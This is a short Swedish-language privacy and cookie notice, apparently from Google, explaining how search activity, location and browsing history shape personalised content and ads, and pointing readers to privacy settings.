Innehåll utan anpassning påverkas bland annat av vad du tittar på för tillfället, aktivitet i din aktiva söksession och din plats. Innehåll utan anpassning påverkas bland annat av vad du tittar på för tillfället och din ungefärliga plats. Innehåll och annonser med anpassning kan även omfatta mer relevanta resultat, rekommendationer och anpassade annonser utifrån tidigare aktivitet i webbläsaren, till exempel tidigare sökningar på Google. Vi använder även cookies och data för att anpassa upplevelsen efter lämplighet för din målgrupp, om tillämpligt.

Välj knappen Fler alternativ för mer information, till exempel om hur du hanterar dina integritetsinställningar. Du kan även besöka g.co/privacytools när som helst.

Tag

#google